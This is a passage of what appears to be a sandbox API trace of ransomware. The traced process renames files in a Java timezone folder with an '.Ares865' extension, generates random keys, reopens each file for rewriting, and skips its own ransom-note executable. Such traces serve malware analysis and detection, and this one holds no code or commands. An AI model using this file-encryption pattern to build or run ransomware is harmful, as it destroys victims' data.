dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.959] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.959] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.960] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Prague" | out: lpString1="Prague") returned="Prague" [0133.960] lstrlenW (lpString="Prague") returned 6 [0133.960] lstrlenW (lpString="Ares865") returned 7 [0133.960] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague.Ares865") returned 61 [0133.960] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\prague"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\prague.ares865"), dwFlags=0x1) returned 1 [0133.961] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\prague.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.962] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1216) returned 1 [0133.962] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.962] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.963] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.965] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.965] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.965] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.966] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Riga" | out: lpString1="Riga") returned="Riga" [0133.966] lstrlenW (lpString="Riga") returned 4 [0133.966] lstrlenW (lpString="Ares865") returned 7 [0133.966] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga.Ares865") returned 59 [0133.966] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\riga"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\riga.ares865"), dwFlags=0x1) returned 1 [0133.968] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\riga.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.968] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1108) returned 1 [0133.968] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.969] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.969] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.975] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.976] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.976] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.976] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Rome" | out: lpString1="Rome") returned="Rome" [0133.976] lstrlenW (lpString="Rome") returned 4 [0133.976] lstrlenW (lpString="Ares865") returned 7 [0133.977] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome.Ares865") returned 59 [0133.977] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\rome"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\rome.ares865"), dwFlags=0x1) returned 1 [0133.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\rome.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.979] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1440) returned 1 [0133.979] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.980] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.980] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.982] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.983] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.983] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.983] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Samara" | out: lpString1="Samara") returned="Samara" [0133.983] lstrlenW (lpString="Samara") returned 6 [0133.983] lstrlenW (lpString="Ares865") returned 7 [0133.984] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara.Ares865") returned 61 [0133.984] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\samara"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\samara.ares865"), dwFlags=0x1) returned 1 [0133.985] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\samara.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.985] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0133.986] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.986] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.986] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.989] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.989] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.989] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.990] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Simferopol" | out: lpString1="Simferopol") returned="Simferopol" [0133.990] lstrlenW (lpString="Simferopol") returned 10 [0133.990] lstrlenW (lpString="Ares865") returned 7 [0133.990] lstrcmpiW (lpString1="feropol", lpString2="Ares865") returned 1 [0133.990] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol.Ares865") returned 65 [0133.990] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\simferopol"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\simferopol.ares865"), dwFlags=0x1) returned 1 [0133.992] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\simferopol.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.992] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1064) returned 1 [0133.992] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.993] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.993] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.995] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.996] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.996] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.996] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Sofia" | out: lpString1="Sofia") returned="Sofia" [0133.996] lstrlenW (lpString="Sofia") returned 5 [0133.996] lstrlenW (lpString="Ares865") returned 7 [0133.996] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia.Ares865") returned 60 [0133.996] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\sofia"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\sofia.ares865"), dwFlags=0x1) returned 1 [0133.998] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\sofia.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.999] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1088) returned 1 [0133.999] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.999] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.000] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.002] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.002] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.002] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.003] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Stockholm" | out: lpString1="Stockholm") returned="Stockholm" [0134.003] lstrlenW (lpString="Stockholm") returned 9 [0134.003] lstrlenW (lpString="Ares865") returned 7 [0134.003] lstrcmpiW (lpString1="ockholm", lpString2="Ares865") returned 1 [0134.003] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm.Ares865") returned 64 [0134.003] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\stockholm"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\stockholm.ares865"), dwFlags=0x1) returned 1 [0134.005] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\stockholm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.005] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1040) returned 1 [0134.005] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.006] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.006] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.008] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.009] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.009] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.009] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Tallinn" | out: lpString1="Tallinn") returned="Tallinn" [0134.009] lstrlenW (lpString="Tallinn") returned 7 [0134.009] lstrlenW (lpString="Ares865") returned 7 [0134.010] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn.Ares865") returned 62 [0134.010] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tallinn"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tallinn.ares865"), dwFlags=0x1) returned 1 [0134.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tallinn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.011] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1080) returned 1 [0134.011] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.012] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.012] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.014] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.015] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.015] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.016] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Tirane" | out: lpString1="Tirane") returned="Tirane" [0134.016] lstrlenW (lpString="Tirane") returned 6 [0134.016] lstrlenW (lpString="Ares865") returned 7 [0134.016] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane.Ares865") returned 61 [0134.016] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tirane"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tirane.ares865"), dwFlags=0x1) returned 1 [0134.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tirane.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.018] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1164) returned 1 [0134.018] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.019] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.019] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.021] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.021] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.021] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.022] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Uzhgorod.Ares865" | out: lpString1="Uzhgorod.Ares865") returned="Uzhgorod.Ares865" [0134.022] lstrlenW (lpString="Uzhgorod.Ares865") returned 16 [0134.022] lstrlenW (lpString="Ares865") returned 7 [0134.022] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0134.022] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74685fa0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74685fa0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x3f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vaduz", cAlternateFileName="")) returned 1 [0134.022] lstrcmpiW (lpString1="Vaduz", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0134.022] lstrcmpiW (lpString1="Vaduz", lpString2="aoldtz.exe") returned 1 [0134.022] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Vaduz" | out: lpString1="Vaduz") returned="Vaduz" [0134.022] lstrlenW (lpString="Vaduz") returned 5 [0134.022] lstrlenW (lpString="Ares865") returned 7 [0134.023] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz.Ares865") returned 60 [0134.023] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vaduz"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vaduz.ares865"), dwFlags=0x1) returned 1 [0134.024] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vaduz.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.024] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1008) returned 1 [0134.024] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.025] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.025] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.027] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.028] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.028] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.028] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Vienna" | out: lpString1="Vienna") returned="Vienna" [0134.029] lstrlenW (lpString="Vienna") returned 6 [0134.029] lstrlenW (lpString="Ares865") returned 7 [0134.029] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna.Ares865") returned 61 [0134.029] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vienna"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vienna.ares865"), dwFlags=0x1) returned 1 [0134.031] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vienna.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.031] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1200) returned 1 [0134.031] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.032] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.032] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.035] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.035] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.035] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.036] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Vilnius" | out: lpString1="Vilnius") returned="Vilnius" [0134.036] lstrlenW (lpString="Vilnius") returned 7 [0134.036] lstrlenW (lpString="Ares865") returned 7 [0134.036] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius.Ares865") returned 62 [0134.036] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vilnius"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vilnius.ares865"), dwFlags=0x1) returned 1 [0134.038] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vilnius.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.038] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1060) returned 1 [0134.038] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.039] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.039] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.041] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.041] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.042] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.042] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Volgograd" | out: lpString1="Volgograd") returned="Volgograd" [0134.042] lstrlenW (lpString="Volgograd") returned 9 [0134.042] lstrlenW (lpString="Ares865") returned 7 [0134.042] lstrcmpiW (lpString1="lgograd", lpString2="Ares865") returned 1 [0134.042] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd.Ares865") returned 64 [0134.042] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\volgograd"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd.Ares865" (normalized: "c:\\program files 